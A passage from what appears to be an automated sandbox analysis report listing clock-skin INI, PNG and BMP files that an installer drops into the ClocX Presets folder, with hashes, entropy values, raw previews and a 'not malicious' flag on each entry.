Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0xFF00FF ;cut window by this color (default red).....;not used with PNG in Win2k/XP..DisableAMPM=0 ;force AM/PM indicator disabled (default 0)..AMPMColor=0x787878.;color of AM/PM indicator..AMPMFont=Times New Roman..AMPMFontSize=14 ;size of AM/PM font..AMPMCenterX=61..AMPMCenterY=122......DisableDate=0..DateColor=0x00FF00..DateFont=Arial..DateFontSize=30..DateCenterX=1000..DateCenterY=25......HourColor=0x0000FF ;color of hour hand..HourLength=160 ;length of hour hand..HourLap=0 ;overlap of hour hand..HourWidth=10 ;width of hour hand....MinuteColor=0x0000FF ;color of minute hand..MinuteLength=210 ;length of minute hand..MinuteLap=0 ;overlap of minute hand..MinuteWidth=10 ;width of minute hand....SecondColor=0x00FF00 ;color of second hand..SecondLength=250 ;length of second hand..SecondLap=10 ;ove

C:\Program Files (x86)\ClocX\Presets\VioletteKugler.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 1600 x 900, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	18058
Entropy (8bit):	7.755795810552902
Encrypted:	false
SSDEEP:	384:uysVnL98NSU2tOrwmR154tM8Bc88TqnlJpd:uySXUaO9R4fBc86qhd
MD5:	579BD68B443B5AE75F83B7E55DCB66C1
SHA1:	447CEAAFECA2F9C59C5C5FE9E15EC1EFABDD173D
SHA-256:	5F8639EC82C166074EC913ED4B953C9CC91363B597A2A103CFDE56B4E4ED3FBB
SHA-512:	48872345D9FC0B9DBBCA498DC0C0BF8E5CBEF6D08F046EDEEDAC91C24416AAFFBDC43E113196B7A41F25D5552CC198B3F1CF5FED5771CB478C9CE39FEA4403D5
Malicious:	false
Preview:	.PNG........IHDR...@................tIME......:.t.O....pHYs.........B.4.....PLTE).=,.B..E0.G3.L4.N6.P7.R8.S:.W<.Z>.\?.^@.`B.cD.eE.gF.hG.jH.lJ.nL.qM.sN.uO.vP.xR.zS.\|T.}U..V..X..Y..Z..[..\..^..`..a..b..c..d..f..h..i..j..k..l..n..o..p..q..r..t..u..v..w..x..z..\|..}..~................................. . . . .."..$..&..).+.-...0.2.4.9.;.<.>.B.C.E.G.H.J.L.P.S.U.W.X.Z.\.^.a.c.e.f.h.h.j.l.m.o.q.q.s.v.t.v.x..z..{..}...................................................................................................................................................................................................................................................................................................................................k......tRNS...........................................................................................................................................

C:\Program Files (x86)\ClocX\Presets\Wall Clock medium-sec.hpng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 72 x 14, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	323
Entropy (8bit):	6.973816325694284
Encrypted:	false
SSDEEP:	6:6v/lhP++2xlv3zF1QOOtWbUgdyNxhnYpXLxDaRPYXuoBUSvux2nrkFp:6v/72rzF1wtWb9cxx0VGYXuoBUGlnwr
MD5:	B5ACF30D1585FAB9DA09CDA5D6A4FEE2
SHA1:	98FA6BFA72F2C9241AABB36EF6E36F5B9723E666
SHA-256:	616E149F162DBDEAE89BC3FEB6271BCB5300FAE10000F55DC56B0E399B60A055
SHA-512:	A74BF2DD5B37F76111AF6DE4AD754CBE04441DCEEDC8472510F89EC8997C9C7EA19C3C86226EC5E3C868384DA0396FCBFD687430441D4792159509BD12CDFC20
Malicious:	false
Preview:	.PNG........IHDR...H...........Z6....pHYs..........o.d....IDATx..]..0.E......Ud......Q?2Z..A.Co"....4.!....X...=JHR.lD.!..KA...!.!+.[R......+.M...QU..)%y..\|g....A.y..4...Gr..9B..l.W..{fo.JA.k7.O....wK.n...../.PM.....4...-.9.....b....?+...<0.L.[.Z.%3.H.q\%.Q.......4...w/....3s..8....O..........n.....IEND.B`.

C:\Program Files (x86)\ClocX\Presets\Wall Clock medium.bmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PC bitmap, Windows 3.x format, 158 x 157 x 24, image size 74732, resolution 3780 x 3780 px/m, cbSize 74786, bits offset 54
Category:	dropped
Size (bytes):	74786
Entropy (8bit):	6.085881051700042
Encrypted:	false
SSDEEP:	768:hHhvyP75gct7nK+cQ/d7yJZFDU+nfVOjKx2mW6ENRObp+A6iAk9x1:phKP7ndKcd7u/tOjKx2hNcAH+9x1
MD5:	A87FB416D0D925EC81816E43B4E6205D
SHA1:	7355F2E82AA5D9B11C706C4275F86986C26A421F
SHA-256:	8C923EEC22B59E971EF0D1A0FFF6C8F2D7B42C8577BE7430CF3E1E4F0024F3B7
SHA-512:	DB905387E6F802486AC225F7762E4F8F21FF78756D27B7C9B662771496B94EE0BB30CA1F7DAE3E38852B443639E3D08D17E091FC1442A874F5C3DA77B46F64A6
Malicious:	false
Preview:	BM"$......6...(....................#................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................@K@K2IV3HS2DK0@G/?E/>D-;A)4;%.4")0.%&.$%.$'.&*.%+.)...............................................................................................................................................................................................................

C:\Program Files (x86)\ClocX\Presets\Wall Clock medium.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1493
Entropy (8bit):	4.861749071075584
Encrypted:	false
SSDEEP:	24:BEQrGXz5lrx7Bxi3aKSmgTONMI10XDkpfoIG/w8b4ia33NPeibQ0Wd9iBxLJCb:BzqFlyfWI9KIGoQOtPBQJTiBxLG
MD5:	757BA281994BD6E525EA724A8B9E30DF
SHA1:	B3FEDAB89B7DC05765AF004177EC25E784715CF6
SHA-256:	191A3FCD80972FDCBE2D2C69C9FA0E3A414B25CA38F9239588F6923F25269B7E
SHA-512:	33195194B59F0C85135AFFB1A518813257CFCD78F4DCB6CC6AE7546EAF3402A53E935430BBE8699695AC7123F88883CAD423BD061B2F64CB09F7D37AD8AEE8A1
Malicious:	false
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0x0000FF ;cut window by this color (default red).....;not used with PNG in Win2k/XP....DisableAMPM=0 ;force AM/PM indicator disabled (default 0)..AMPMColor=0x232323.;color of AM/PM indicator..AMPMFont=Times New Roman..AMPMFontSize=10 ;size of AM/PM font....DisableDate=0..DateColor=0x232323..DateFont=Arial..DateFontSize=11....HourColor=0x000000 ;color of hour hand..HourLength=42 ;length of hour hand..HourLap=7 ;overlap of hour hand..HourWidth=4 ;width of hour hand....MinuteColor=0x000000 ;color of minute hand..MinuteLength=57 ;length of minute hand..MinuteLap=7 ;overlap of minute hand..MinuteWidth=4 ;width of minute hand....SecondColor=0x553F99 ;color of second hand..SecondLength=63 ;length of second hand..SecondLap=10 ;overlap of second hand..SecondWidth=1 ;width of second hand....

C:\Program Files (x86)\ClocX\Presets\White_Apple_Clock.bmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PC bitmap, Windows 3.x format, 101 x 122 x 24, resolution 2834 x 2834 px/m, cbSize 37144, bits offset 54
Category:	dropped
Size (bytes):	37144
Entropy (8bit):	5.323192077358441
Encrypted:	false
SSDEEP:	192:3G+xNKrzZ4gb85tG/llgjmJahf7TyTWU8DgEdtN8xytFmnmU9OHGTV/zMmZilkL0:3JNK543hjTyTWU4gEdz8Icnf9PFs3D8e
MD5:	FBD9CA6CBBC07C9F7B16577E2BA8ABB0
SHA1:	4F9A98C739E9D209F77AD99396A8A4B77C0CFE69
SHA-256:	AB8D75A5B7230938E834DA4ECB043256DFE5466A30E59B2787BD08EAC14DE50B
SHA-512:	FE2371EB44023BEF023CB68E63AF745A3593E15FCC6DBC882090F62532E617C886924EB9AE04ABFC5C47785354217ED382E8DCCCBAFDBC6BF1DE11F0895BAFE8
Malicious:	false
Preview:	BM........6...(...e...z......................................................................................................................{{{sssooommmlllllllllpppuuu{{{.............................................................................................\|\|\|vvvsssqqqppppppsssxxx.......................................................................................................................................................yyysssmmmiiifffdddccccccdddeeedddeeejjjpppyyy........................................................................\|\|\|tttooommmjjjkkkhhhffffffgggfffdddhhhnnnxxx........................................................................................................................................\|\|\|sssqqqvvv..................\|\|\|uuuoooddd```bbbcccjjjrrrzzz......................................................\|\|\|tttppplllhhhkkkpppssszzzzzzyyyyyyzzztttkkk```bbbfffooo}}}.........................................................................................

C:\Program Files (x86)\ClocX\Presets\White_Apple_Clock.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	12531
Entropy (8bit):	7.8267819411607915
Encrypted:	false
SSDEEP:	192:WSb0V3Zxh1e7NN+aOZbEOMqy7wF6wYpk58VxjbqFS1VqmxVQLSopM7C2HUv5oxzR:5AVzferOZbbpUC15KoSPxgM7CMW5oDO4
MD5:	18B08FAD1BD9BD1098FC3772888D36F2
SHA1:	B7A44F8BE157ED798B1A1B9CB2D56E5761A2B481
SHA-256:	72E437C91CDCA423FCC9F7AFC91DFBA616157BC2AB344590BAAE62B75089F19A
SHA-512:	3B520D891E037507FDE5EAC7D53CEDCFB0404377987B065901681DA2630EAD9E6E54E115A4D042A7D95EF3E789C1A84AE29F72A2A77D25E84932DACA75053F01
Malicious:	false
Preview:	.PNG........IHDR..............>a.....pHYs.................gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F..0iIDATx....Fp....3e...).gsJI.\.{9.k1.....+.b`.).y.....gy..O=.u]x..8...<a..$I.,.(.}...,.Q..4M.a.<.m.<.CY.H....C.E.4..e!.....8.w....N.eY.......0.+..5M...X..m.b...B0..CQ.TU.UU..1\..l....p.Gt].....'uQ..o....@,...$.J.....%.. ...0.....R..... 9..n`....mh8....`..@..&...(r.%.0.Tr......L......}c..._.~..cgg..L .......@...........@..U;@....f, .),,......">\|....h./#...1.....l@..Z...L~.....@\q/......3......j... ..v.....X.(........?.-....h...bfee5.6..edd.E;....G<(.A.......p...T...~. .i.>....@...O....$99..`.......r...xNNN....p".......7o>.z)@...~..................r"77.D`.!G>.=..hP..".....p..Zr.}...;`"...\@...n...4.....4.....FQ....A..``..e..tl.W....:..^........_^.x..........+..@C>.....g.q..CKK....N.9..(........r....X.."...@.......4P.......\|.....w.@#.?R...l.@....%.(.@..j...i..`.NX^^>OLLL...C..a....$.+u`.........X........ .....H...E.h...Q.v.@.6(.>~....M2

C:\Program Files (x86)\ClocX\Presets\WidestoneStudios.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	982
Entropy (8bit):	4.7035599187649675
Encrypted:	false
SSDEEP:	12:a4EqmYvrrijpJTpb27XFPVGRXFdnXFPVJ99XFPhNhXFqA2kBIok9Gst81M2qYKcy:BEErI1MTwFBP1rfEk5CGm8Z5kNOi
MD5:	0B235DC651E778ACE561CE903E1BCBAE
SHA1:	56AAD578090CBC90B8F760019FC0339175988E21
SHA-256:	AA2D6050B1B0211D43AD6BC919E239B42C9A361FCFC07995F470F3FF3557DD75
SHA-512:	8047B11BA23C3DF7B31C316BBAD5EACAD11972B6C61AADE18C1CE31F2BD553C567066B5823827064E378C7D0F9AB18A5801305CFA84920C80256713D7C288BA0
Malicious:	false
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0xC5BE47.;0000FF ;cut window by this color (default red)..ShowAMPM=1 ;show AM/PM indicator (default 0)..AMPMColor=0xAA5F55.;color of AM/PM indicator....HourColor=0xC5BE47.;AA5F55 ;color of hour hand..HourLenght=33 ;length of hour hand..HourLap=5 ;overlap of hour hand..HourWidth=3 ;width of hour hand....MinuteColor=0xC5BE47.;AA5F55 ;color of minute hand..MinuteLenght=47 ;length of minute hand..MinuteLap=5 ;overlap of minute hand..MinuteWidth=2 ;width of minute hand....SecondColor=0xC5BE47.;E8F08E ;color of second hand..SecondLenght=54 ;length of second hand..SecondLap=10 ;overlap of second hand..SecondWidth=1 ;width of second hand....CenterX=80 ;center point's X (default image_width / 2)..CenterY=52 ;center point's Y (default image_height / 2)..

C:\Program Files (x86)\ClocX\Presets\WidestoneStudios.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 144 x 104, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	13391
Entropy (8bit):	7.865143077553108
Encrypted:	false
SSDEEP:	192:/SD4RQg9vDQfUzRKk44poiF6QoqHK8fdhP1eUBuvuHyQT1BFni6XNPH/xGkvjm:qDN2vWk44GdQoshNeUsxgDni8PHZGAjm
MD5:	EBFFA2AD6F19E5418BB2F65E3B4CF5D4
SHA1:	87C70FBB8C6A0F4C83D67320931D23C4A498197E
SHA-256:	DC92936E7F1B197A209BED51B50C2C274564E22EBDB6889880B58D11DF993834
SHA-512:	1403E27E73AC6420AEB9B9218679A7378585BE165C94A0AAC0EE791B7128D9396F57F441FCB18EB243A5ED9923184B2C5FFA296AF4C90A3E8551143EB94FEFEE
Malicious:	false
Preview:	.PNG........IHDR.......h.......y.....pHYs.................gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F..3.IDATx.bd```b.....A..d..@.0.F.....#........4..F... .......K..-..9.. fh.S..!...)!!'8..f .&....?..@..Z.1...N.....M<.....#.."..].!'$h..O..Q04.@.....MP.%.0......c.bB.L..#%%.(......O.a$!a...N.G.!..dd.....8..@.d.8."...A..........q..IID..$..8..NX..DN.b.c..5$.^.2b..D....<.....JT...2H.5..D.&.&.'1...p..H...X..?.m.a......v.-K.\..=.0#.aKL..JBBB...........C....?h..H...(f..}....eff.....x...GH...M...V.. ..)..O%..K.....3....p}<<<.lll...L,`.L..@...H...GND06:..@......w......N.<y...+q..D..@..l/z.a.H..`&`..ecgwfae5......<.@..z..%.l.\.A......3.G..2.K2.e...~~.c...=...\|.r.....q$(..pH.R...8..1..6..........Y&ffG`d....0.@..R"..h..=.....^duO.=b...#........4...P.*...J.?..\.r..a,............8@..r.AO4.H...M.......5..(la..J(...K(XJ.h...J. ........^@....`.c......bd...G.o_...q..2....j..L...7..1...A.............M... ......$.V$..cs...2..&.cD.........aDm. .......fx........x.

C:\Program Files (x86)\ClocX\Presets\Wonderglobe2.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 95 x 95, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	20649
Entropy (8bit):	7.9768824867321575
Encrypted:	false
SSDEEP:	384:USxy+3/jChO3XBcz2dlqj4SH1kp+6tqmBbBrf0EunL3a2OtT89UvEPa4DRnlO8za:vx//jJ3Xazmg4SVbgzBran7J8TFj4DtY
MD5:	6C8F406A6AA5DBFC6DD07E10842867DB
SHA1:	B2E7FA8AAE533ED129F3A5BA1733A89A5CA42105
SHA-256:	5C2FAA546C5860E69F39C7BCF97D67F473F3301EE19460B9769934A946FEF390
SHA-512:	E0C98580FE0F8520E617CA1D539537C46E7E34DAA52F2FC987AB484BB97038739F16B7C53C5A519F74B9EF887E3E23E23B563170CDB5AB5679925D1F61E1D3DA
Malicious:	false
Preview:	.PNG........IHDR..._..._......L......bKGD..............pHYs............... .IDATx..Yl..y.7.m..H..H..A[.(.R.-.....KR....(Q.B..G.D...j!%J..S..K.(...Fc..<....@..5..I...8.......C..u.6N...o..s.w.....S...B<+.x.......B./\|....+....f...3..\|A...B..R......#...!D.R..I)....B...U.P4I).^..%!...]....h..H)..R~YJ.!.<.B..B.B~KJ.m).B...w...{...B.y(.....R.z(.....{B.w....B\\.vm_.1(..S!...j~Z......Y!...R.Z.~.V..U(K~.,)..........`z..;.hpd.jl.z59kg..d..dj......Y.G&0.....sU......gJu.{R.....o.!"B..!....#.\|..I..J)..$......!..Rq)..Ju.{.5..6.LW.#....Y^.`c../..."....G.....!v.A.. ;;~.};lnn...eu..k..s...9..G.u~XV].cEI.B(.#.\|I.P...%.x.W.._.B...rJ.w.%e.R^....g.j...g.`(Blw..~.L&K..#...dI.3.Ri..u.63..u..0.H.X,F4.%....~D.o...eu...."3.........k..W...@.T.R.U(.eR...4.......3B.J+.o.........H,N2.....B.@.X.X<...B.@.P.. ......+....!"...H.H$B4.%....DX\Zd}.M..'........dm.....6....):...kl.@SZ.#.B..!....q.?..`EOK).PUs..6w.}0mw].....,..!.l.\.G.P......rvv..78:*...#......q/.......m.p....\|

C:\Program Files (x86)\ClocX\Presets\alarme.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1475
Entropy (8bit):	4.853612525961072
Encrypted:	false
SSDEEP:	24:BEQrGXz5lr9BxoaKy4rTORXFB01rfDkpWdGm8diF0PfXvibQ0Wd9iBxLuQI:BzqFluf1QFKOMdGmUPfwQJTiBxLvI
MD5:	D821262416FC40D087348659DEC1C6E4
SHA1:	05E9FD31BA6667274CC8B94466446AE492D41A3C
SHA-256:	FEBEBCCFF26778BA1204CB6D58A7E889D44ADBED33BC0FEFAA3E32CEF632FE3B
SHA-512:	278482031BE63DA8B81FA5529ACB5E3735E2ADAF6E5CA3D3398E838BAF80EA04FAC7747C1848FDE578958A50A05F0B1C7487815FF7D4F4F7C65EEBC1EBEABD03
Malicious:	false
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0x0000FF ;cut window by this color (default red).....;not used with PNG in Win2k/XP....DisableAMPM=0 ;force AM/PM indicator disabled (default 0)..AMPMColor=0x787878.;color of AM/PM indicator..AMPMFont=Times New Roman..AMPMFontSize=10 ;size of AM/PM font....DisableDate=0..DateColor=0x787878..DateFont=Arial..DateFontSize=12....HourColor=0x000000 ;color of hour hand..HourLength=33 ;length of hour hand..HourLap=0 ;overlap of hour hand..HourWidth=3 ;width of hour hand....MinuteColor=0x000000 ;color of minute hand..MinuteLength=51 ;length of minute hand..MinuteLap=0 ;overlap of minute hand..MinuteWidth=2 ;width of minute hand....SecondColor=0x000000 ;color of second hand..SecondLength=55 ;length of second hand..SecondLap=0 ;overlap of second hand..SecondWidth=1 ;width of second hand.... C

C:\Program Files (x86)\ClocX\Presets\alarme.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 218 x 273, 8-bit/color RGBA, interlaced
Category:	dropped
Size (bytes):	96516
Entropy (8bit):	7.919324419762643
Encrypted:	false
SSDEEP:	1536:OrUAxUUOq+08PZwDmJr9EfkFF8mYIDMvGZKfCg+kRTdIeKr86G0Ktu3O2UQ2s:P4wZwDsr9Efkv1xwGIfj+kR0r8LJQZ
MD5:	1138A4BE4BB0FA2728E3D6DFE1C6B2E4
SHA1:	1001A4D64D36486FAD7E5ACDDD4F458829FC435D
SHA-256:	7DA15B7C64292B1FE73983085A174669892A93D3CF344A613EBEE8C33687898A
SHA-512:	1251CF147BB1FCFF466F4C2C2A78F8DAD1275BA3B2DA5E9BB7543E10B10A07E7E8361416C1A1BDE4B7A03281E6904766F0D7A0EC99DF1BA8708D2818D7C722E6
Malicious:	false
Preview:	.PNG........IHDR.............jB......gAMA....\|.Q.... cHRM..z%..............u0...`..:....o......x.IDATx.b...?..0222..w.?...:.#..;'k._LLL..jB.......f):8}.2..w..k7o..:c..555.QQQ.II..@_..... 9...r.......@8-.Z.k...[.L. ...0 6.b1 .b..Ej.....\|....6.bf\....N._.z...1..E............dF.1.65.....c'O.....d.6...c...8....b5l.......%= z..5/..B..o.b...............w_...)A)..&.....x.....Y...?...?o......#......Pi.d.....R..l.-=.Aq....?-3..Xd..k'..7.>..S .1.......W6X?(.>}...PZ..->......@...O........>2\|..........ATJ........>f`...a..6@-_......d....../....O?.... /+.....@.]0...........i..&..........0..sf.g....Y.\|E..H...X3...._.......H....c...c.z..$VVVP.Y..@`.F....ax{u.........4;7'...s:....}..... -.. ....'..E....^...q..)._...p.2..0f.....}..Td...v...k.....P...'..{......`"...@Y.K@N.AO_{..2..F...J.......+...J...B..GO...y.6.<......./...3.c@........J,...S......d...@..xJCC.....n....{.8\|.6..of.iQ>./.Y.2.=y....a..]M......;MH..........J&@<. .X..6(5}...(...[`.-.).6k.C...[v]b.v.

C:\Program Files (x86)\ClocX\Presets\apple.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1472
Entropy (8bit):	4.872769610377242
Encrypted:	false
SSDEEP:	24:BE8rGXz5lr9BxoaKy4YPTOI01rfwPkpGdGm8bCi1iYdeibQ0Wd9iBxLuQI:BTqFluf19j4dGmQDiYdBQJTiBxLvI
MD5:	38F4322D84E0E6A5BD58BBE888061AC7
SHA1:	4DB5C23A6298D62914714E7B92E11EF4CB41AC35
SHA-256:	FFE096724F22FDD9CFB9C9622CE51F965648D9EE7C2C5537B39F5C1313A6391F
SHA-512:	1F9278D5A21F71680E024B195D02E9E14D229712C0CA88719FDAA5BF03861B70DD65E12CCEA4E46455B31673F8C6B9F6A9BC6100CB4C9728A7039FDC713FBF2F
Malicious:	false
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0x000000 ;cut window by this color (default red).....;not used with PNG in Win2k/XP....DisableAMPM=0 ;force AM/PM indicator disabled (default 0)..AMPMColor=0x787878.;color of AM/PM indicator..AMPMFont=Times New Roman..AMPMFontSize=10 ;size of AM/PM font....DisableDate=0..DateColor=0x787878..DateFont=Arial..DateFontSize=12....HourColor=0x9A4F45 ;color of hour hand..HourLength=25 ;length of hour hand..HourLap=0 ;overlap of hour hand..HourWidth=3 ;width of hour hand....MinuteColor=0x9A4F45 ;color of minute hand..MinuteLength=42 ;length of minute hand..MinuteLap=0 ;overlap of minute hand..MinuteWidth=2 ;width of minute hand....SecondColor=0x553FFF ;color of second hand..SecondLength=44 ;length of second hand..SecondLap=0 ;overlap of second hand..SecondWidth=1 ;width of second hand....Ce

C:\Program Files (x86)\ClocX\Presets\aqua-clock1.bmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PC bitmap, Windows 3.x format, 107 x 114 x 24, resolution 2834 x 2834 px/m, cbSize 36992, bits offset 54
Category:	dropped
Size (bytes):	36992
Entropy (8bit):	5.610490122908846
Encrypted:	false
SSDEEP:	192:CBccMWRLppppppW111111MhOCZX0/oYkjkX/dOMQz6ruH2qraRsEtNRY0ZE7DFF8:CBvcQX0/lOvf8BNvw1lKXlJ
MD5:	56F18FD2EC130B2714C9BFEEF92ED37A
SHA1:	0BFCBBC051BA9323D9A8B5F0D7DDF77C75A21985
SHA-256:	9E5A84DA02E5BB837B575B899F4FF55F5A0095C412C4433A2CFC922208CAFA66
SHA-512:	897F923C68A601667A7AE09F1802F41F6F0E663D74F80887A8EB4ACE9AE1942DF26C368BDD0814285170B7A5B940E9A3774AAA7D90DFF426A5016260DB445BDA
Malicious:	false
Preview:	BM........6...(...k...r..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................xh.\|g..m..j..l..q..t..s..t..t..t..t..t..u..t..t..t..t..t..t..t..t..u..u..u..u..u..u..u..u..u..t..u..q..k..b.w_.lZvja.............................................................

C:\Program Files (x86)\ClocX\Presets\aqua-clock2.bmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PC bitmap, Windows 3.x format, 112 x 113 x 24, resolution 2834 x 2834 px/m, cbSize 38024, bits offset 54
Category:	dropped
Size (bytes):	38024
Entropy (8bit):	3.804159517586175
Encrypted:	false
SSDEEP:	96:mEPBcUiVCRGqKcOnrmGDVNdKh9B+QRGB9Ov7OPcmn:mEP00xRGhQG
MD5:	FAD209473000F30FB8AC132E5ADDBB94
SHA1:	5886423659F1DE4D705BA68583C3B36D9A3857F4
SHA-256:	8F8E24924515FF1CC157405FD35A2DFA60E49558A4E11CAE4406D88C75202BD5
SHA-512:	78DF2A704FDF25EE45621005349CF2893E14A9BC909404606CCE44126FCBE1D4EF6B2C70951B18049D3AFD8526E12A5BBDB25B44EB4E80EA90438CE1E352536B
Malicious:	false
Preview:	BM........6...(...p...q.................................q..q..w..o..m..l..q..q..q..q..q..r..r..q..q..p..p..p..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..q..q..q..q..q..q..q..q..q..q..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..q..k.zd..q..q..q..q..q..q.............................................................................................................................................................................................................................q..q.....................................................................................................................................................................................

C:\Program Files (x86)\ClocX\Presets\aquamade.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	949
Entropy (8bit):	4.571347043037757
Encrypted:	false
SSDEEP:	24:BEQrIADTORXFB01rfjkpWdGm8xiF0ZJGi:BzCFKuMdGmEZJp
MD5:	96FD9CCA4BBB46E48F65EC26E3AA1F3D
SHA1:	AEA8888332BF8635A1FFDBEAED9E8A632A21423C
SHA-256:	D56E5151C7EB06AD35A0364BAA8D95DDB11700754889C5498DFA6AF2CA945888
SHA-512:	F4C10EB0AFDC7E54B8DBE0C02ED2C6C22A9B6912A683536796B1FBFF0BA1BF19DCA969375002C13331666A0266DD42E38BAB628D047AF4B1C1A490786E0C3B47
Malicious:	false
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0x0000FF ;cut window by this color (default red)..ShowAMPM=1 ;show AM/PM indicator (default 0)..AMPMColor=0x00000000.;color of AM/PM indicator....HourColor=0x00000000 ;color of hour hand..HourLength=33 ;length of hour hand..HourLap=0 ;overlap of hour hand..HourWidth=3 ;width of hour hand....MinuteColor=0x00000000 ;color of minute hand..MinuteLength=51 ;length of minute hand..MinuteLap=0 ;overlap of minute hand..MinuteWidth=2 ;width of minute hand....SecondColor=0x000000FF ;color of second hand..SecondLength=55 ;length of second hand..SecondLap=0 ;overlap of second hand..SecondWidth=1 ;width of second hand....CenterX=63 ;center point's X (default image_width / 2)..CenterY=61 ;center point's Y (default image_height / 2)..

C:\Program Files (x86)\ClocX\Presets\bahnhofsuhr.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1540
Entropy (8bit):	4.909224216363058
Encrypted:	false
SSDEEP:	24:BE8rGXE5lr9BxjTJaKhVY/qTORXFB01rfwkpWdGm8bCi51PgibQ0Wd9iBxLuQI:BTqyllTJfgLFK3MdGmQ71PXQJTiBxLvI
MD5:	BA768117B0EE7DCC4D22D0CF34F17177
SHA1:	048DF18F592EB751DC8094BA82BC77A9EC7E1316
SHA-256:	2B6EED6932C65F8AC44E36D62C4BBED226DB938ACB6AB43134E756F5F85DE943
SHA-512:	9A22B6F9A1ED5807C0C9B7E6974E0717C54F255A7E26F03097D3AC92A9A4EE1FD8C02F7707302E3078BE29176554DE32D9514ED849963B8A1AECCC3126137F71
Malicious:	false
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0x000000 ;cut window by this color (default red).....;not used with PNG in Win2k/XP..DisableAMPM=0 ;force AM/PM indicator disabled (default 0)..AMPMColor=0x787878.;color of AM/PM indicator..AMPMFont=Times New Roman..AMPMFontSize=10 ;size of AM/PM font..AMPMCenterX=61..AMPMCenterY=88......DisableDate=0..DateColor=0x787878..DateFont=Arial..DateFontSize=12..DateCenterX=62..DateCenterY=45......HourColor=0xAA5F55 ;color of hour hand..HourLength=33 ;length of hour hand..HourLap=0 ;overlap of hour hand..HourWidth=3 ;width of hour hand....MinuteColor=0xAA5F55 ;color of minute hand..MinuteLength=51 ;length of minute hand..MinuteLap=0 ;overlap of minute hand..MinuteWidth=2 ;width of minute hand....SecondColor=0x553FFF ;color of second hand..SecondLength=54 ;length of second hand..SecondLap=0 ;overlap o

C:\Program Files (x86)\ClocX\Presets\black and steel.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1573
Entropy (8bit):	4.92543323823258
Encrypted:	false
SSDEEP:	24:BE0rGXE5lr9BP5WaKDihTOh01kPkpFgdGm8RiTm7ib/v7Wd9iBI5auQI:BTqylRWfkbIdGm5msCTiBtvI
MD5:	885F743529845BDC1B4C9766FDA77D0A
SHA1:	478E113115B3958E77076D0F1E2F7CFBCEE00FCF
SHA-256:	56FB2FC2890BAFB2324D7168D211B1DDC91AF4C869EEB5613F15B2073757C83C
SHA-512:	553A98A1D2C039C053C048E391BC81E5E84509EFB7EB84E38B194C167BD2FCCFBE93263E92CBE505624433B4EBCB042B4A76749420448D2ED818C7500A2C7B12
Malicious:	false
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0xFF00FF ;cut window by this color (default red).....;not used with PNG in Win2k/XP..DisableAMPM=0 ;force AM/PM indicator disabled (default 0)..AMPMColor=0x787878.;color of AM/PM indicator..AMPMFont=Times New Roman..AMPMFontSize=14 ;size of AM/PM font..AMPMCenterX=61..AMPMCenterY=122......DisableDate=1..DateColor=0xFFFFFF..DateFont=Arial..DateFontSize=16..DateCenterX=75..DateCenterY=100......HourColor=0xFFFFFF ;color of hour hand..HourLength=35 ;length of hour hand..HourLap=0 ;overlap of hour hand..HourWidth=2 ;width of hour hand....MinuteColor=0xFFFFFF ;color of minute hand..MinuteLength=55 ;length of minute hand..MinuteLap=0 ;overlap of minute hand..MinuteWidth=2 ;width of minute hand....SecondColor=0x0000FF ;color of second hand..SecondLength=60 ;length of second hand..SecondLap=10 ;overlap

C:\Program Files (x86)\ClocX\Presets\black and steel.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
